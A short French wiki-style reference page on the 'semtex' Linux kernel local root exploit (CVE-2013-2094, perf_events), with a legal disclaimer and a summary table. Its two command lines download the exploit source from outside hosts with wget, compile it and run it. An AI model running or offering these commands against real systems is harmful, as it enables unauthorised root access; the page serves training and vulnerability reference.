Semtex
Aller à la navigation
Aller à la recherche
🔒 Contenu de sécurité — usage encadré
Cette page décrit un exploit d'élévation de privilèges (CVE-2013-2094) à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).
Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.
| Fiche express | |
|---|---|
| CVE | CVE-2013-2094 |
| Type | Elevation de privileges locale (root) |
| Cause | Defaut du sous-systeme perf_events du noyau |
| Cibles | Noyaux Linux 2.6.32 a 3.8.10 |
semtex est un exploit local root du noyau Linux (perf_events, CVE-2013-2094) affectant les noyaux 2.6.32 a 3.8.10.
Présentation
privileges escalation pour noyaux linux 2.6.32 à 3.8.10
$ wget www.tux-planet.fr/public/hack/exploits/kernel/semtex.c $ gcc -O2 semtex.c $ ./a.out
wget http://fucksheep.org/~sd/warez/semtex.c --quiet && gcc-4.6 -O2 semtex.c && ./a.out